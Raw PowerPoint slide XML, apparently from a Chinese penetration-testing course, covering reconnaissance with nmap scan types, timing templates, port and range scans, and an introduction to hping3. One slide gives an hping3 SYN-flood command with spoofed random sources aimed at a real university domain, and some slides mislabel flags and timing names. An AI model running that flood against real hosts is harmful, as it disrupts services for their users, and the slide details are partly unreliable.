          <a:xfrm>
            <a:off x="827143" y="1181099"/>
            <a:ext cx="2778014"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>nmap -sS -Pn URI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Shape 365"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936332" y="7073900"/>
            <a:ext cx="5036134"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200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>-sS （-s =&gt; 哪种扫描类型？S=&gt; SYN）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="366" name="image46.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="871250" y="2679811"/>
            <a:ext cx="11262299" cy="3581178"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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8" name="Shape 368"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804228" y="266699"/>
            <a:ext cx="8563243"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>ACK 扫描：ACK扫描，用于确定TCP端口是否被防火墙过滤</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Shape 369"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="824196" y="1181099"/>
            <a:ext cx="2783906"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>nmap -sA -Pn URI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370" name="Shape 370"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918324" y="7073900"/>
            <a:ext cx="507215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200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>-sS （-s =&gt; 哪种扫描类型？A=&gt; ACK）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="371" name="image47.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="711975" y="2730660"/>
            <a:ext cx="11920154" cy="2770833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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3" name="Shape 373"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610854" y="279399"/>
            <a:ext cx="8493790"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>UDP 扫描（DHCP,DNS,SNMP,TFTP等都使用了UDP协议）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="Shape 374"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640584" y="2005850"/>
            <a:ext cx="228409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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>nmap -sU  URI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Shape 375"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629950" y="1168025"/>
            <a:ext cx="11262298"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300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>UDP扫描会评估目标系统上的UDP端口，可以确认UDP端口是开放还是被防火墙过滤。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Shape 376"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749231" y="6730998"/>
            <a:ext cx="821703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1" sz="2200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>U=&gt; UDP, V=&gt;版本信息 (-sV UDP扫描中添加版本扫描信息)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>不存在-PN参数（从UDP协议去理解，你发了就ok管他收没收到）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="377" name="image48.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="675523" y="3480174"/>
            <a:ext cx="10621127" cy="2056652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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9" name="Shape 379"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610855" y="279399"/>
            <a:ext cx="1784276"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Timing模板</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Shape 380"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745330" y="1016000"/>
            <a:ext cx="11298239" cy="3302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500"/>
            </a:pPr>
            <a:r>
              <a:t>timing参数可以指定nmap扫描的速度。其中各个选项如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>T0：paranoid 慢速网络扫描，串行扫描，两次扫描间隔5分钟。扫描速度极慢。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>T1:Sneky 慢速网络扫描，串行扫描，两次扫描间隔15秒，扫描速度较慢。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>T2:Polite 中速网络扫描，串行扫描，两次扫描间隔400毫秒，扫描速度慢。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>T3:Normal 中速网络扫描，并行扫描，两次扫描间隔0秒，扫描速度正常。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>T4:Aggressive 快速网络扫描，并行扫描，两次扫描间隔0秒，扫描速度较快。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>T5:Normal 快速网络扫描，并行扫描，两次扫描间隔0秒，扫描速度极快。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="381" name="image49.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165935" y="4876848"/>
            <a:ext cx="10156115" cy="3531856"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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Shape 158"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4933205" y="761999"/>
            <a:ext cx="2247901" cy="85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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="4200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>信息侦察</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Shape 159"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="subTitle" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2046633" y="4648200"/>
            <a:ext cx="5406433" cy="3345458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>网站及服务器信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>搜索引擎</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Google Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>社交网站</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>第三方未公开数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Shape 160"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497012" y="1645574"/>
            <a:ext cx="10436822" cy="153045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l" defTabSz="914400">
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>收集渗透目标的情报是最重要的阶段。如果收集到有用的情报资料的话，可以大大提高对渗透测试的成功性。收集渗透目标的情报一般是对目标系统的分析，扫描探测，服务查点，扫描对方漏洞，查找对方系统</a:t>
            </a:r>
            <a:r>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>等，有时候渗透测试者也会用上</a:t>
            </a:r>
            <a:r>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>社会工程学</a:t>
            </a:r>
            <a:r>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>。渗透测试者会尽力搜集目标系统的配置与安全防御以及防火墙等等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Shape 161"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4971304" y="3685711"/>
            <a:ext cx="19431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内容概要</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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3" name="Shape 383"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610854" y="279399"/>
            <a:ext cx="2495396"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>扫描端口 -p Port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Shape 384"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639988" y="914399"/>
            <a:ext cx="3536418"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>nmap -sS -p PORT URI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="385" name="image50.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="645699" y="1730377"/>
            <a:ext cx="11459403" cy="5336059"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Shape 386"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533449" y="7399812"/>
            <a:ext cx="63626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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>nmap -sS -p 80,135,3380-3389 192.168.1.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Shape 387"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="8077200"/>
            <a:ext cx="8265478"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上图扫描80、135、3380-3389端口，结果只有80端口开放</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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9" name="Shape 389"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610855" y="279399"/>
            <a:ext cx="1366782"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>扫描IP段</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="Shape 390"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590550" y="1079499"/>
            <a:ext cx="9256342"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500"/>
            </a:pPr>
            <a:r>
              <a:t>nmap 192.168.1.1-255</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t> #扫描192.168.1.1－192.168.1.255所有IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="Shape 391"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590550" y="1778000"/>
            <a:ext cx="9238720"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500"/>
            </a:pPr>
            <a:r>
              <a:t>nmap 192.168.1.1/24</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:t>#扫描192.168.1.1－192.168.1.255所有IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Shape 392"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="599385" y="2476500"/>
            <a:ext cx="7277150"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500"/>
            </a:pPr>
            <a:r>
              <a:t>nmap -iL IPL.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:t> #扫描IPL.txt中保存的所有IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Shape 393"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610855" y="3873499"/>
            <a:ext cx="201930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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>输出保存选项</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Shape 394"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647319" y="4673599"/>
            <a:ext cx="3871913" cy="193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500"/>
            </a:pPr>
            <a:r>
              <a:t>-oN 保存为文本文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>-oX 保存为XML文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>-oG 保存为GREPable输出</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>-oS 脚本输出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Shape 395"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657909" y="6845300"/>
            <a:ext cx="11301414"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nmap -oN metscan.txt 192.168.154.134   #将扫描结果保存到metscan.txt文件。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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7" name="Shape 397"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972050" y="459911"/>
            <a:ext cx="1654324"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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3700">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>hping3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Shape 398"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647698" y="1220556"/>
            <a:ext cx="11406727" cy="193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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>hping3是一款面向TCP/IP协议的免费的数据包生成和分析工具。Hping是用于对防火墙和网络执行安全审计和测试的事实上的工具之一。hping3可使用Tcl语言编写脚本，实施了一个引擎，可用于对TCP/IP数据包进行基于字符串、人可读的描述等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Shape 399"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749298" y="3213099"/>
            <a:ext cx="138430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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>命令结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Shape 400"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="682190" y="3893905"/>
            <a:ext cx="11640419"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>hping3 -c 1000 -d 120 -S  -w 64 -p 80 —flood —rand-source www.hdu.edu.cn </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Shape 401"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707749" y="4597398"/>
            <a:ext cx="11747869"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200"/>
            </a:pPr>
            <a:r>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
